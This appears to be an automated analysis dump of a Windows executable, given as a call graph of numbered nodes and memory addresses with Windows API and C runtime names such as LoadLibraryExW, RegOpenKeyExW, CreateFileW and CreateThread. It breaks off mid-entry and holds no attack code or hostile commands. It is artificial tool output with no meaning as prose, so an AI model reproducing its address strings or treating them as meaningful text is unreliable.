7ff73d0844a2 FreeEnvironmentStringsW 93410->93411 93411->93406 93412->93402 93414 7ff73d07caf7 93413->93414 93418 7ff73d07cabb fread_s 93413->93418 93421 7ff73d07b734 15 API calls abort 93414->93421 93416 7ff73d07cade RtlAllocateHeap 93417 7ff73d07caf5 93416->93417 93416->93418 93417->93409 93418->93414 93418->93416 93420 7ff73d0697ec EnterCriticalSection LeaveCriticalSection fread_s 93418->93420 93420->93418 93421->93417 93422 7ff73d065870 93446 7ff73d0651f4 93422->93446 93425 7ff73d0659bc 93469 7ff73d065d6c 7 API calls 2 library calls 93425->93469 93427 7ff73d06588c 93428 7ff73d0659c6 93427->93428 93429 7ff73d0658aa 93427->93429 93470 7ff73d065d6c 7 API calls 2 library calls 93428->93470 93438 7ff73d0658ec __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 93429->93438 93452 7ff73d07b2cc 93429->93452 93433 7ff73d0658cf 93434 7ff73d0659d1 abort 93436 7ff73d065955 93463 7ff73d065eb8 93436->93463 93438->93436 93466 7ff73d069794 35 API calls IsInExceptionSpec 93438->93466 93440 7ff73d06595a 93441 7ff73d065976 93440->93441 93467 7ff73d065efc GetModuleHandleW 93441->93467 93444 7ff73d06597d 93444->93434 93468 7ff73d0653d8 8 API calls 2 library calls 93444->93468 93445 7ff73d065994 93445->93433 93447 7ff73d065216 __isa_available_init 93446->93447 93471 7ff73d066b7c 93447->93471 93449 7ff73d06521b __scrt_initialize_crt 93451 7ff73d06521f 93449->93451 93479 7ff73d066bb0 8 API calls 3 library calls 93449->93479 93451->93425 93451->93427 93454 7ff73d07b2e4 93452->93454 93453 7ff73d0658cb 93453->93433 93456 7ff73d07b254 93453->93456 93454->93453 93504 7ff73d06578c 93454->93504 93457 7ff73d07b290 93456->93457 93458 7ff73d07b2af 93456->93458 93457->93458 93563 7ff73d0410e8 93457->93563 93568 7ff73d041064 93457->93568 93573 7ff73d041048 93457->93573 93578 7ff73d041080 93457->93578 93458->93438 93763 7ff73d0667d0 93463->93763 93466->93436 93467->93444 93468->93445 93469->93428 93470->93434 93472 7ff73d066b85 __vcrt_initialize_winapi_thunks __vcrt_initialize 93471->93472 93480 7ff73d067820 93472->93480 93476 7ff73d066b9c 93477 7ff73d066b93 93476->93477 93487 7ff73d067868 DeleteCriticalSection 93476->93487 93477->93449 93479->93451 93481 7ff73d067828 93480->93481 93483 7ff73d067859 93481->93483 93484 7ff73d066b8f 93481->93484 93488 7ff73d067ba4 93481->93488 93493 7ff73d067868 DeleteCriticalSection 93483->93493 93484->93477 93486 7ff73d0677a8 8 API calls 3 library calls 93484->93486 93486->93476 93487->93477 93494 7ff73d0678a0 93488->93494 93491 7ff73d067be4 93491->93481 93492 7ff73d067bef InitializeCriticalSectionAndSpinCount 93492->93491 93493->93484 93495 7ff73d067901 93494->93495 93499 7ff73d0678fc try_get_function 93494->93499 93495->93491 93495->93492 93496 7ff73d067930 LoadLibraryExW 93497 7ff73d067951 GetLastError 93496->93497 93496->93499 93497->93499 93498 7ff73d0679f2 GetProcAddress 93501 7ff73d067a03 93498->93501 93499->93495 93499->93496 93500 7ff73d0679e4 93499->93500 93502 7ff73d0679c9 FreeLibrary 93499->93502 93503 7ff73d06798b LoadLibraryExW 93499->93503 93500->93495 93500->93498 93501->93495 93502->93499 93503->93499 93505 7ff73d06579c 93504->93505 93521 7ff73d072b14 93505->93521 93507 7ff73d0657a8 93527 7ff73d065240 93507->93527 93509 7ff73d065816 93520 7ff73d065832 93509->93520 93555 7ff73d065d6c 7 API calls 2 library calls 93509->93555 93511 7ff73d0657c1 _RTC_Initialize 93511->93509 93513 7ff73d065454 __scrt_initialize_thread_safe_statics 34 API calls 93511->93513 93512 7ff73d065842 __scrt_initialize_default_local_stdio_options 93512->93454 93514 7ff73d0657d6 93513->93514 93532 7ff73d07a54c 93514->93532 93518 7ff73d0657eb 93519 7ff73d07b36c 35 API calls 93518->93519 93519->93509 93520->93454 93522 7ff73d072b25 93521->93522 93524 7ff73d072b2d 93522->93524 93556 7ff73d07b734 15 API calls abort 93522->93556 93524->93507 93525 7ff73d072b3c 93557 7ff73d07b614 31 API calls _invalid_parameter_noinfo 93525->93557 93528 7ff73d065255 93527->93528 93531 7ff73d06525e __scrt_initialize_onexit_tables 93527->93531 93528->93531 93558 7ff73d065d6c 7 API calls 2 library calls 93528->93558 93530 7ff73d065317 93531->93511 93533 7ff73d07a56a 93532->93533 93534 7ff73d07a580 GetModuleFileNameW 93532->93534 93559 7ff73d07b734 15 API calls abort 93533->93559 93539 7ff73d07a5ad 93534->93539 93536 7ff73d07a56f 93560 7ff73d07b614 31 API calls _invalid_parameter_noinfo 93536->93560 93538 7ff73d0657e2 93538->93509 93554 7ff73d06604c InitializeSListHead 93538->93554 93561 7ff73d07a4e8 15 API calls 2 library calls 93539->93561 93541 7ff73d07a5ed 93542 7ff73d07a5f5 93541->93542 93544 7ff73d07a606 93541->93544 93562 7ff73d07b734 15 API calls abort 93542->93562 93546 7ff73d07a66b 93544->93546 93547 7ff73d07a652 93544->93547 93551 7ff73d07a5fa 93544->93551 93545 7ff73d07b950 __free_lconv_num 15 API calls 93545->93538 93549 7ff73d07b950 __free_lconv_num 15 API calls 93546->93549 93548 7ff73d07b950 __free_lconv_num 15 API calls 93547->93548 93550 7ff73d07a65b 93548->93550 93549->93551 93552 7ff73d07b950 __free_lconv_num 15 API calls 93550->93552 93551->93545 93553 7ff73d07a667 93552->93553 93553->93538 93555->93512 93556->93525 93557->93524 93558->93530 93559->93536 93560->93538 93561->93541 93562->93551 93583 7ff73d061d7c 93563->93583 93566 7ff73d065404 _onexit 34 API calls 93567 7ff73d06545d 93566->93567 93567->93457 93607 7ff73d044de4 93568->93607 93570 7ff73d04106d 93571 7ff73d065404 _onexit 34 API calls 93570->93571 93572 7ff73d06545d 93571->93572 93572->93457 93698 7ff73d044b00 93573->93698 93576 7ff73d065404 _onexit 34 API calls 93577 7ff73d06545d 93576->93577 93577->93457 93716 7ff73d044c4c 93578->93716 93580 7ff73d04109e 93581 7ff73d065404 _onexit 34 API calls 93580->93581 93582 7ff73d06545d 93581->93582 93582->93457 93584 7ff73d0472b8 4 API calls 93583->93584 93585 7ff73d061dae GetVersionExW 93584->93585 93586 7ff73d045f44 4 API calls 93585->93586 93587 7ff73d061df8 93586->93587 93587->93587 93588 7ff73d04ba94 4 API calls 93587->93588 93589 7ff73d061e83 93587->93589 93588->93587 93590 7ff73d04ba94 4 API calls 93589->93590 93594 7ff73d061ea0 93590->93594 93591 7ff73d0a9bf0 93592 7ff73d0a9bfa 93591->93592 93605 7ff73d0b3f7c LoadLibraryA GetProcAddress 93592->93605 93593 7ff73d061f3c GetCurrentProcess IsWow64Process 93595 7ff73d061f7e fread_s 93593->93595 93594->93591 93594->93593 93595->93592 93597 7ff73d061f86 GetSystemInfo 93595->93597 93599 7ff73d0410f1 93597->93599 93598 7ff73d0a9c5c 93600 7ff73d0a9c82 GetSystemInfo 93598->93600 93601 7ff73d0a9c60 93598->93601 93599->93566 93603 7ff73d0a9c6a 93600->93603 93606 7ff73d0b3f7c LoadLibraryA GetProcAddress 93601->93606 93603->93599 93604 7ff73d0a9c9b FreeLibrary 93603->93604 93604->93599 93605->93598 93606->93603 93643 7ff73d04591c 93607->93643 93610 7ff73d04591c 4 API calls 93611 7ff73d044e5b 93610->93611 93612 7ff73d0472b8 4 API calls 93611->93612 93613 7ff73d044e67 93612->93613 93614 7ff73d045f44 4 API calls 93613->93614 93615 7ff73d044e7a 93614->93615 93650 7ff73d0633e4 6 API calls 93615->93650 93617 7ff73d044ec6 93618 7ff73d0472b8 4 API calls 93617->93618 93619 7ff73d044ed2 93618->93619 93620 7ff73d0472b8 4 API calls 93619->93620 93621 7ff73d044ede 93620->93621 93622 7ff73d0472b8 4 API calls 93621->93622 93623 7ff73d044eea 93622->93623 93624 7ff73d0472b8 4 API calls 93623->93624 93625 7ff73d044f30 93624->93625 93626 7ff73d0472b8 4 API calls 93625->93626 93627 7ff73d045018 93626->93627 93651 7ff73d043ec4 93627->93651 93629 7ff73d045024 93662 7ff73d0455a8 93629->93662 93631 7ff73d045050 93632 7ff73d0472b8 4 API calls 93631->93632 93633 7ff73d04505c 93632->93633 93675 7ff73d054ec0 93633->93675 93637 7ff73d0450d3 93638 7ff73d0450e5 GetStdHandle 93637->93638 93639 7ff73d08b2b0 93638->93639 93640 7ff73d045147 OleInitializeWOW 93638->93640 93692 7ff73d0c0d98 CreateThread 93639->93692 93640->93570 93642 7ff73d08b2c7 CloseHandle 93644 7ff73d0472b8 4 API calls 93643->93644 93645 7ff73d04592e 93644->93645 93646 7ff73d0472b8 4 API calls 93645->93646 93647 7ff73d045937 93646->93647 93648 7ff73d0472b8 4 API calls 93647->93648 93649 7ff73d044e4f 93648->93649 93649->93610 93650->93617 93652 7ff73d0472b8 4 API calls 93651->93652 93653 7ff73d043eda 93652->93653 93654 7ff73d0472b8 4 API calls 93653->93654 93655 7ff73d043ee3 93654->93655 93693 7ff73d047278 93655->93693 93658 7ff73d047278 4 API calls 93659 7ff73d043ef8 93658->93659 93660 7ff73d0472b8 4 API calls 93659->93660 93661 7ff73d043f04 93660->93661 93661->93629 93663 7ff73d0455be 93662->93663 93664 7ff73d0472b8 4 API calls 93663->93664 93665 7ff73d0455ca 93664->93665 93666 7ff73d0472b8 4 API calls 93665->93666 93667 7ff73d0455d6 93666->93667 93668 7ff73d0472b8 4 API calls 93667->93668 93669 7ff73d0455e2 93668->93669 93670 7ff73d0472b8 4 API calls 93669->93670 93671 7ff73d0455ee 93670->93671 93672 7ff73d047278 4 API calls 93671->93672 93673 7ff73d0455fa 93672->93673 93674 7ff73d045604 RegisterWindowMessageW 93673->93674 93674->93631 93676 7ff73d054f39 93675->93676 93683 7ff73d054f00 93675->93683 93696 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93676->93696 93684 7ff73d045092 93683->93684 93697 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93683->93697 93685 7ff73d063f24 93684->93685 93686 7ff73d063f48 93685->93686 93687 7ff73d0ab25a 93685->93687 93686->93637 93688 7ff73d04c98c 4 API calls 93687->93688 93689 7ff73d0ab266 93688->93689 93690 7ff73d04c98c 4 API calls 93689->93690 93691 7ff73d0ab285 93690->93691 93692->93642 93694 7ff73d0472b8 4 API calls 93693->93694 93695 7ff73d043eec 93694->93695 93695->93658 93699 7ff73d0472b8 4 API calls 93698->93699 93700 7ff73d044b77 93699->93700 93705 7ff73d044330 93700->93705 93703 7ff73d044c14 93704 7ff73d041051 93703->93704 93708 7ff73d0452a0 4 API calls 2 library calls 93703->93708 93704->93576 93709 7ff73d04436c 93705->93709 93708->93703 93710 7ff73d04435e 93709->93710 93711 7ff73d044391 93709->93711 93710->93703 93711->93710 93712 7ff73d04439f RegOpenKeyExW 93711->93712 93712->93710 93713 7ff73d0443bb RegQueryValueExW 93712->93713 93714 7ff73d0443e9 93713->93714 93715 7ff73d044401 RegCloseKey 93713->93715 93714->93715 93715->93710 93717 7ff73d044c74 wcsftime 93716->93717 93718 7ff73d0472b8 4 API calls 93717->93718 93719 7ff73d044d2e 93718->93719 93746 7ff73d05d3a0 93719->93746 93721 7ff73d044d38 93753 7ff73d0436ac 93721->93753 93724 7ff73d045624 4 API calls 93725 7ff73d044d58 93724->93725 93759 7ff73d0451dc 93725->93759 93727 7ff73d044d69 93728 7ff73d0472b8 4 API calls 93727->93728 93729 7ff73d044d73 93728->93729 93730 7ff73d0489a4 4 API calls 93729->93730 93731 7ff73d044d7d RegOpenKeyExW 93730->93731 93732 7ff73d044daf Concurrency::wait 93731->93732 93733 7ff73d08b0ee RegQueryValueExW 93731->93733 93732->93580 93734 7ff73d08b121 93733->93734 93735 7ff73d08b1c3 RegCloseKey 93733->93735 93736 7ff73d0651a8 4 API calls 93734->93736 93735->93732 93745 7ff73d08b1d9 wcscat Concurrency::wait 93735->93745 93737 7ff73d08b144 93736->93737 93738 7ff73d08b151 RegQueryValueExW 93737->93738 93739 7ff73d08b185 93738->93739 93742 7ff73d08b1a4 Concurrency::wait 93738->93742 93740 7ff73d045f44 4 API calls 93739->93740 93740->93742 93741 7ff73d04778c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93741->93745 93742->93735 93743 7ff73d04c848 4 API calls 93743->93745 93744 7ff73d0451dc 4 API calls 93744->93745 93745->93732 93745->93741 93745->93743 93745->93744 93747 7ff73d089520 wcsftime 93746->93747 93748 7ff73d05d3ac GetModuleFileNameW 93747->93748 93749 7ff73d04c848 4 API calls 93748->93749 93750 7ff73d05d3d4 93749->93750 93751 7ff73d05d3f4 5 API calls 93750->93751 93752 7ff73d05d3e1 Concurrency::wait 93751->93752 93752->93721 93754 7ff73d089520 wcsftime 93753->93754 93755 7ff73d0436b8 GetFullPathNameW 93754->93755 93756 7ff73d0436e8 93755->93756 93757 7ff73d045f44 4 API calls 93756->93757 93758 7ff73d043702 93757->93758 93758->93724 93760 7ff73d0451fb 93759->93760 93762 7ff73d045224 memcpy_s Concurrency::wait 93759->93762 93761 7ff73d0651a8 4 API calls 93760->93761 93761->93762 93762->93727 93764 7ff73d065ecf GetStartupInfoW 93763->93764 93764->93440 93765 7ff73d09a06c 93766 7ff73d09a078 93765->93766 93769 7ff73d04ec0c memcpy_s Concurrency::wait 93765->93769 93767 7ff73d0ac054 15 API calls 93766->93767 93767->93769 93768 7ff73d04ecba Concurrency::wait 93769->93768 93770 7ff73d0651a8 4 API calls 93769->93770 93770->93769 94576 7ff73d052851 94579 7ff73d052e19 94576->94579 94580 7ff73d052862 94576->94580 94577 7ff73d09df76 94605 7ff73d0c185c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94577->94605 94578 7ff73d04c98c 4 API calls 94578->94580 94579->94580 94583 7ff73d04609c 4 API calls 94579->94583 94580->94577 94580->94578 94581 7ff73d0528d2 94580->94581 94582 7ff73d054840 208 API calls 94581->94582 94591 7ff73d051cf0 Concurrency::wait 94581->94591 94582->94591 94583->94580 94585 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94585->94591 94586 7ff73d09ed08 94607 7ff73d0c44e8 78 API calls 3 library calls 94586->94607 94588 7ff73d09ed1b 94589 7ff73d052aff 94595 7ff73d052b19 94589->94595 94597 7ff73d09e60e 94589->94597 94601 7ff73d052b30 94589->94601 94591->94585 94591->94586 94591->94589 94592 7ff73d0530de 94591->94592 94594 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94591->94594 94591->94595 94598 7ff73d051e4e Concurrency::wait 94591->94598 94599 7ff73d04609c 4 API calls 94591->94599 94602 7ff73d053450 208 API calls 94591->94602 94603 7ff73d065454 34 API calls __scrt_initialize_thread_safe_statics 94591->94603 94604 7ff73d0472b8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94591->94604 94606 7ff73d0c44e8 78 API calls 3 library calls 94591->94606 94596 7ff73d04609c 4 API calls 94592->94596 94593 7ff73d04609c 4 API calls 94593->94598 94594->94591 94595->94593 94595->94601 94596->94598 94600 7ff73d04609c 4 API calls 94597->94600 94599->94591 94600->94601 94602->94591 94603->94591 94604->94591 94605->94591 94606->94591 94607->94588 93771 7ff73d05c69c 93772 7ff73d05c6c1 wcsftime 93771->93772 93773 7ff73d0a0ed2 fread_s 93772->93773 93774 7ff73d05c6e3 93772->93774 93776 7ff73d0a0ef3 GetOpenFileNameW 93773->93776 93775 7ff73d05d3f4 5 API calls 93774->93775 93777 7ff73d05c6ee 93775->93777 93778 7ff73d0a0f56 93776->93778 93779 7ff73d05c715 93776->93779 93787 7ff73d05d4c0 93777->93787 93781 7ff73d045f44 4 API calls 93778->93781 93783 7ff73d0a0f62 93781->93783 93785 7ff73d05c704 93805 7ff73d05c754 93785->93805 93788 7ff73d089520 wcsftime 93787->93788 93789 7ff73d05d4d0 GetLongPathNameW 93788->93789 93790 7ff73d045f44 4 API calls 93789->93790 93791 7ff73d05c6f9 93790->93791 93792 7ff73d05d2a0 93791->93792 93793 7ff73d0472b8 4 API calls 93792->93793 93794 7ff73d05d2ba 93793->93794 93795 7ff73d05d3f4 5 API calls 93794->93795 93796 7ff73d05d2c7 93795->93796 93797 7ff73d05d2d3 93796->93797 93802 7ff73d0a16a4 93796->93802 93798 7ff73d0451dc 4 API calls 93797->93798 93800 7ff73d05d2e1 93798->93800 93834 7ff73d05d314 93800->93834 93803 7ff73d0a16d9 93802->93803 93838 7ff73d0618a0 CompareStringW 93802->93838 93804 7ff73d05d2f7 Concurrency::wait 93804->93785 93839 7ff73d05c820 93805->93839 93808 7ff73d0a0f68 93941 7ff73d0c382c 90 API calls 93808->93941 93810 7ff73d05c820 105 API calls 93812 7ff73d05c7c0 93810->93812 93811 7ff73d0a0f79 93813 7ff73d0a0f9b 93811->93813 93814 7ff73d0a0f7d 93811->93814 93812->93808 93815 7ff73d05c7c8 93812->93815 93817 7ff73d0651a8 4 API calls 93813->93817 93942 7ff73d05c8ec 93814->93942 93818 7ff73d0a0f86 93815->93818 93819 7ff73d05c7d4 93815->93819 93833 7ff73d0a0fe8 Concurrency::wait 93817->93833 93948 7ff73d0bd2b0 78 API calls wprintf 93818->93948 93865 7ff73d04c3e0 93819->93865 93823 7ff73d0a0f95 93823->93813 93824 7ff73d05c8ec 63 API calls 93830 7ff73d0a11a0 Concurrency::wait 93824->93830 93825 7ff73d048790 4 API calls 93825->93833 93827 7ff73d0479d0 4 API calls 93827->93833 93829 7ff73d04c848 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93829->93833 93830->93824 93952 7ff73d0b8350 78 API calls 3 library calls 93830->93952 93833->93825 93833->93827 93833->93829 93833->93830 93949 7ff73d0b8078 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93833->93949 93950 7ff73d0b7f84 39 API calls Concurrency::wait 93833->93950 93951 7ff73d0c0fe0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93833->93951 93835 7ff73d05d333 93834->93835 93837 7ff73d05d35c memcpy_s Concurrency::wait 93834->93837 93836 7ff73d0651a8 4 API calls 93835->93836 93836->93837 93837->93804 93838->93802 93953 7ff73d05d258 93839->93953 93842 7ff73d05d258 2 API calls 93845 7ff73d05c85d 93842->93845 93843 7ff73d05c87a FreeLibrary 93844 7ff73d05c880 93843->93844 93957 7ff73d074e70 93844->93957 93845->93843 93845->93844 93848 7ff73d0a1200 93850 7ff73d05c8ec 63 API calls 93848->93850 93849 7ff73d05c89b LoadLibraryW 93976 7ff73d05d1b8 93849->93976 93852 7ff73d0a1208 93850->93852 93854 7ff73d05d1b8 3 API calls 93852->93854 93856 7ff73d0a1211 93854->93856 93994 7ff73d05cb08 93856->93994 93857 7ff73d05c8c5 93857->93856 93858 7ff73d05c8d2 93857->93858 93859 7ff73d05c8ec 63 API calls 93858->93859 93861 7ff73d05c7a5 93859->93861 93861->93808 93861->93810 93864 7ff73d0a1249 93866 7ff73d04c439 93865->93866 93867 7ff73d09848e 93865->93867 94207 7ff73d0459b4 93866->94207 94304 7ff73d0b8350 78 API calls 3 library calls 93867->94304 93871 7ff73d0984a8 94305 7ff73d0b8350 78 API calls 3 library calls 93871->94305 93875 7ff73d04c471 93877 7ff73d0472b8 4 API calls 93875->93877 93876 7ff73d0984c9 93879 7ff73d04c4cb 93876->93879 93878 7ff73d04c47a 93877->93878 94234 7ff73d064b18 93878->94234 93882 7ff73d04c4d9 93879->93882 93883 7ff73d0984dd 93879->93883 93886 7ff73d0472b8 4 API calls 93882->93886 93885 7ff73d04597c FindCloseChangeNotification 93883->93885 93884 7ff73d0472b8 4 API calls 93887 7ff73d04c48c 93884->93887 93888 7ff73d0984e6 93885->93888 93889 7ff73d04c4e3 93886->93889 93890 7ff73d05d3f4 5 API calls 93887->93890 93891 7ff73d05c820 105 API calls 93888->93891 93892 7ff73d0472b8 4 API calls 93889->93892 93893 7ff73d04c49c 93890->93893 93894 7ff73d09850b 93891->93894 93895 7ff73d04c4ed 93892->93895 94296 7ff73d05c734 ReadFile SetFilePointerEx 93893->94296 93897 7ff73d09882e 93894->93897 94306 7ff73d0c382c 90 API calls 93894->94306 93898 7ff73d04533c 4 API calls 93895->93898 94312 7ff73d0b8350 78 API calls 3 library calls 93897->94312 93902 7ff73d04c508 93898->93902 93900 7ff73d04c4bc 94297 7ff73d05cd48 93900->94297 93903 7ff73d045e74 4 API calls 93902->93903 93906 7ff73d04c517 SetCurrentDirectoryW 93903->93906 93905 7ff73d098526 93907 7ff73d05c8ec 63 API calls 93905->93907 93909 7ff73d04c52c Concurrency::wait 93906->93909 93908 7ff73d098531 93907->93908 93908->93897 93912 7ff73d098539 93908->93912 93910 7ff73d0651a8 4 API calls 93909->93910 93920 7ff73d04c540 Concurrency::wait 93910->93920 93914 7ff73d048790 4 API calls 93912->93914 93924 7ff73d0985b8 Concurrency::wait 93914->93924 93915 7ff73d04c64f 94293 7ff73d04597c 93915->94293 93919 7ff73d09879b 94310 7ff73d0b19a4 4 API calls 2 library calls 93919->94310 93920->93915 93927 7ff73d098889 93920->93927 93937 7ff73d04c848 4 API calls 93920->93937 94239 7ff73d047da0 93920->94239 94247 7ff73d04c080 93920->94247 94251 7ff73d04c1ac 93920->94251 94289 7ff73d04bee4 93920->94289 94313 7ff73d0b7ef0 4 API calls 3 library calls 93920->94313 93922 7ff73d048790 4 API calls 93922->93924 93923 7ff73d04c670 Concurrency::wait 94303 7ff73d04594c FindCloseChangeNotification Concurrency::wait 93923->94303 93924->93919 93924->93922 93928 7ff73d04bee4 4 API calls 93924->93928 93930 7ff73d04c848 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93924->93930 93934 7ff73d0987f5 93924->93934 94307 7ff73d0b8078 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93924->94307 94308 7ff73d0b7f84 39 API calls Concurrency::wait 93924->94308 94309 7ff73d0c0fe0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93924->94309 94314 7ff73d0b8350 78 API calls 3 library calls 93927->94314 93928->93924 93930->93924 93931 7ff73d0988a7 93931->93915 94311 7ff73d0b8350 78 API calls 3 library calls 93934->94311 93937->93920 93939 7ff73d09881c Concurrency::wait 93939->93923 93941->93811 93943 7ff73d05c8fd 93942->93943 93944 7ff73d05c902 93942->93944 94405 7ff73d074f00 93943->94405 93946 7ff73d0a1298 FreeLibrary 93944->93946 93947 7ff73d05c920 93944->93947 93947->93818 93948->93823 93949->93833 93950->93833 93951->93833 93952->93830 93954 7ff73d05d268 LoadLibraryA 93953->93954 93955 7ff73d05c850 93953->93955 93954->93955 93956 7ff73d05d27d GetProcAddress 93954->93956 93955->93842 93955->93845 93956->93955 93958 7ff73d074d8c 93957->93958 93959 7ff73d074dba 93958->93959 93962 7ff73d074dec 93958->93962 94012 7ff73d07b734 15 API calls abort 93959->94012 93961 7ff73d074dbf 94013 7ff73d07b614 31 API calls _invalid_parameter_noinfo 93961->94013 93964 7ff73d074df2 93962->93964 93965 7ff73d074dff 93962->93965 94014 7ff73d07b734 15 API calls abort 93964->94014 94000 7ff73d080444 93965->94000 93966 7ff73d05c88f 93966->93848 93966->93849 93970 7ff73d074e13 94015 7ff73d07b734 15 API calls abort 93970->94015 93971 7ff73d074e20 94007 7ff73d080894 93971->94007 93974 7ff73d074e33 94016 7ff73d06e4f0 LeaveCriticalSection 93974->94016 94182 7ff73d05d210 93976->94182 93979 7ff73d05d1e5 93981 7ff73d05c8b7 93979->93981 93982 7ff73d05d203 FreeLibrary 93979->93982 93980 7ff73d05d210 2 API calls 93980->93979 93983 7ff73d05c930 93981->93983 93982->93981 93984 7ff73d0651a8 4 API calls 93983->93984 93985 7ff73d05c961 memcpy_s 93984->93985 93986 7ff73d0a12b4 93985->93986 93991 7ff73d05c9ad 93985->93991 94186 7ff73d0c3ce4 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 93985->94186 94187 7ff73d0c3dbc 45 API calls 93986->94187 93989 7ff73d05cb08 45 API calls 93989->93991 93990 7ff73d0a131c 93992 7ff73d05cb08 45 API calls 93990->93992 93991->93989 93991->93990 93993 7ff73d05ca98 Concurrency::wait 93991->93993 93992->93993 93993->93857 93995 7ff73d0a1380 93994->93995 93996 7ff73d05cb27 93994->93996 94188 7ff73d0751ec 93996->94188 93999 7ff73d0c32f0 32 API calls 93999->93864 94017 7ff73d07bf4c EnterCriticalSection 94000->94017 94002 7ff73d08045b 94003 7ff73d0804e4 18 API calls 94002->94003 94004 7ff73d080466 94003->94004 94005 7ff73d07bfa0 _isindst LeaveCriticalSection 94004->94005 94006 7ff73d074e09 94005->94006 94006->93970 94006->93971 94018 7ff73d0805d0 94007->94018 94010 7ff73d0808ee 94010->93974 94012->93961 94013->93966 94014->93966 94015->93966 94023 7ff73d08060d try_get_function 94018->94023 94020 7ff73d08086e 94037 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94020->94037 94022 7ff73d0807aa 94022->94010 94030 7ff73d087cc8 94022->94030 94023->94023 94026 7ff73d0807a1 94023->94026 94033 7ff73d06e0f8 37 API calls 4 library calls 94023->94033 94025 7ff73d080807 94025->94026 94034 7ff73d06e0f8 37 API calls 4 library calls 94025->94034 94026->94022 94036 7ff73d07b734 15 API calls abort 94026->94036 94028 7ff73d08082a 94028->94026 94035 7ff73d06e0f8 37 API calls 4 library calls 94028->94035 94038 7ff73d087294 94030->94038 94033->94025 94034->94028 94035->94026 94036->94020 94037->94022 94039 7ff73d0872b8 94038->94039 94040 7ff73d0872d0 94038->94040 94092 7ff73d07b734 15 API calls abort 94039->94092 94040->94039 94042 7ff73d0872fd 94040->94042 94049 7ff73d0878d8 94042->94049 94043 7ff73d0872bd 94093 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94043->94093 94046 7ff73d0872c9 94046->94010 94095 7ff73d087608 94049->94095 94052 7ff73d08794c 94127 7ff73d07b714 15 API calls abort 94052->94127 94053 7ff73d087963 94115 7ff73d07e9a8 94053->94115 94056 7ff73d087951 94128 7ff73d07b734 15 API calls abort 94056->94128 94085 7ff73d087325 94085->94046 94094 7ff73d07e984 LeaveCriticalSection 94085->94094 94092->94043 94093->94046 94096 7ff73d087634 94095->94096 94102 7ff73d08764e 94095->94102 94096->94102 94154 7ff73d07b734 15 API calls abort 94096->94154 94098 7ff73d087643 94155 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94098->94155 94100 7ff73d08771c 94114 7ff73d08777c 94100->94114 94160 7ff73d072ae4 31 API calls 2 library calls 94100->94160 94101 7ff73d0876cb 94101->94100 94158 7ff73d07b734 15 API calls abort 94101->94158 94102->94101 94156 7ff73d07b734 15 API calls abort 94102->94156 94105 7ff73d087778 94108 7ff73d0877fb 94105->94108 94105->94114 94107 7ff73d087711 94159 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94107->94159 94161 7ff73d07b634 16 API calls abort 94108->94161 94109 7ff73d0876c0 94157 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94109->94157 94114->94052 94114->94053 94162 7ff73d07bf4c EnterCriticalSection 94115->94162 94127->94056 94128->94085 94154->94098 94155->94102 94156->94109 94157->94101 94158->94107 94159->94100 94160->94105 94183 7ff73d05d1d7 94182->94183 94184 7ff73d05d220 LoadLibraryA 94182->94184 94183->93979 94183->93980 94184->94183 94185 7ff73d05d235 GetProcAddress 94184->94185 94185->94183 94186->93986 94187->93991 94191 7ff73d07520c 94188->94191 94192 7ff73d05cb3a 94191->94192 94193 7ff73d075236 94191->94193 94192->93999 94193->94192 94194 7ff73d075267 94193->94194 94195 7ff73d075245 fread_s 94193->94195 94204 7ff73d06e4e4 EnterCriticalSection 94194->94204 94205 7ff73d07b734 15 API calls abort 94195->94205 94198 7ff73d07526f 94200 7ff73d074f6c fread_s 43 API calls 94198->94200 94199 7ff73d07525a 94206 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94199->94206 94202 7ff73d075286 94200->94202 94203 7ff73d06e4f0 fflush LeaveCriticalSection 94202->94203 94203->94192 94205->94199 94206->94192 94208 7ff73d0651a8 4 API calls 94207->94208 94209 7ff73d0459cb 94208->94209 94210 7ff73d04597c FindCloseChangeNotification 94209->94210 94211 7ff73d0459d7 94210->94211 94212 7ff73d0472b8 4 API calls 94211->94212 94213 7ff73d0459e0 94212->94213 94214 7ff73d04597c FindCloseChangeNotification 94213->94214 94215 7ff73d0459e8 94214->94215 94216 7ff73d05cb68 94215->94216 94217 7ff73d04597c FindCloseChangeNotification 94216->94217 94218 7ff73d05cb8a 94217->94218 94219 7ff73d05cbad CreateFileW 94218->94219 94220 7ff73d0a13bc 94218->94220 94226 7ff73d05cbdb 94219->94226 94221 7ff73d0a13c2 CreateFileW 94220->94221 94222 7ff73d05cc09 94220->94222 94224 7ff73d0a13fa 94221->94224 94221->94226 94223 7ff73d04c469 94222->94223 94230 7ff73d0a1447 94222->94230 94223->93871 94223->93875 94225 7ff73d05cd48 3 API calls 94224->94225 94227 7ff73d0a1407 94225->94227 94226->94223 94315 7ff73d05cc24 94226->94315 94227->94226 94229 7ff73d05cbf1 94229->94222 94231 7ff73d05cd48 3 API calls 94229->94231 94328 7ff73d0bc00c SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 94230->94328 94231->94222 94233 7ff73d0a1481 94233->94223 94235 7ff73d089520 wcsftime 94234->94235 94236 7ff73d064b24 GetCurrentDirectoryW 94235->94236 94237 7ff73d045f44 4 